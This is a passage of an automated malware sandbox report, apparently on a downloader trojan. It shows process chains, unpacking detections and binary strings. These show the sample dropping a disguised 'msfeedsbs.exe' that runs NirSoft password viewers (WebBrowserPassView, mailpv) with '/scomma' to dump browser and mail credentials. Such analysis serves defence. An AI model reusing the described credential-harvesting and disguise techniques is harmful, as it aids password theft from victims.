                Source: msfeedsbs.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe'
                Source: unknownProcess created: C:\Windows\SysWOW64\msi\msfeedsbs.exe C:\Windows\SysWOW64\msi\msfeedsbs.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: unknownProcess created: C:\Windows\SysWOW64\msi\msfeedsbs.exe 'C:\Windows\SysWOW64\msi\msfeedsbs.exe' 'C:\Users\user\AppData\Local\Temp\CB36.tmp'
                Source: unknownProcess created: C:\Windows\SysWOW64\msi\msfeedsbs.exe 'C:\Windows\SysWOW64\msi\msfeedsbs.exe' /scomma 'C:\Users\user\AppData\Local\Temp\D0A6.tmp'
                Source: unknownProcess created: C:\Windows\SysWOW64\msi\msfeedsbs.exe 'C:\Windows\SysWOW64\msi\msfeedsbs.exe' /scomma 'C:\Users\user\AppData\Local\Temp\D402.tmp'
                Source: unknownProcess created: C:\Windows\SysWOW64\msi\msfeedsbsoe.exe 'C:\Windows\SysWOW64\msi\msfeedsbsoe.exe' 'C:\Users\user\AppData\Local\Temp\CB36.tmp'
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeProcess created: C:\Windows\SysWOW64\msi\msfeedsbs.exe C:\Windows\SysWOW64\msi\msfeedsbs.exeJump to behavior
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeProcess created: C:\Windows\SysWOW64\msi\msfeedsbs.exe 'C:\Windows\SysWOW64\msi\msfeedsbs.exe' 'C:\Users\user\AppData\Local\Temp\CB36.tmp'Jump to behavior
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeProcess created: C:\Windows\SysWOW64\msi\msfeedsbs.exe 'C:\Windows\SysWOW64\msi\msfeedsbs.exe' /scomma 'C:\Users\user\AppData\Local\Temp\D0A6.tmp'Jump to behavior
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeProcess created: C:\Windows\SysWOW64\msi\msfeedsbs.exe 'C:\Windows\SysWOW64\msi\msfeedsbs.exe' /scomma 'C:\Users\user\AppData\Local\Temp\D402.tmp'Jump to behavior
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeProcess created: C:\Windows\SysWOW64\msi\msfeedsbsoe.exe 'C:\Windows\SysWOW64\msi\msfeedsbsoe.exe' 'C:\Users\user\AppData\Local\Temp\CB36.tmp'Jump to behavior
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenableJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\RPCJump to behavior
                Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: msfeedsbs.exe
                Source: Binary string: cmd.pdbUGP source: msfeedsbsoe.exe, 0000000A.00000002.278554157.00007FF6F52AE000.00000002.00020000.sdmp, msfeedsbsoe.exe.1.dr
                Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: msfeedsbs.exe
                Source: Binary string: cmd.pdb source: msfeedsbsoe.exe, 0000000A.00000002.278554157.00007FF6F52AE000.00000002.00020000.sdmp, msfeedsbsoe.exe.1.dr

                Data Obfuscation:

                Detected unpacking (changes PE section rights)
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Unpacked PE file: 6.2.msfeedsbs.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.idata:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Unpacked PE file: 7.2.msfeedsbs.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.idata:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Unpacked PE file: 9.2.msfeedsbs.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.idata:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                Detected unpacking (overwrites its own PE header)
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Unpacked PE file: 6.2.msfeedsbs.exe.400000.0.unpack
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Unpacked PE file: 7.2.msfeedsbs.exe.400000.0.unpack
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Unpacked PE file: 9.2.msfeedsbs.exe.400000.0.unpack
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe | Code function: 0_2_0044112E GetModuleHandleA,LoadLibraryA,GetProcAddress,#17,#17,FreeLibrary,0_2_0044112E
                Source: msfeedsbsoe.exe.1.dr | Static PE information: section name: .didat
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe | Code function: 0_2_00412FD0 push eax; ret 0_2_00412FFE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe | Code function: 0_2_004134C8 push eax; ret 0_2_004134E6
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 1_2_00412FD0 push eax; ret 1_2_00412FFE
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 1_2_004134C8 push eax; ret 1_2_004134E6
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 6_2_004048C5 push ecx; ret 6_2_004048D8
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 6_1_004048C5 push ecx; ret 6_1_004048D8
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_2_00445190 push eax; ret 7_2_004451A4
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_2_00445190 push eax; ret 7_2_004451CC
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_2_00449EB4 push eax; ret 7_2_00449EC1
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_2_00444F79 push ecx; ret 7_2_00444F89
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_1_00445190 push eax; ret 7_1_004451A4
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_1_00445190 push eax; ret 7_1_004451CC
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 9_2_00412341 push ecx; ret 9_2_00412351
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 9_2_00412360 push eax; ret 9_2_00412374
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 9_2_00412360 push eax; ret 9_2_0041239C
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 9_1_00412341 push ecx; ret 9_1_00412351
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 9_1_00412360 push eax; ret 9_1_00412374
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 9_1_00412360 push eax; ret 9_1_0041239C

                Persistence and Installation Behavior:
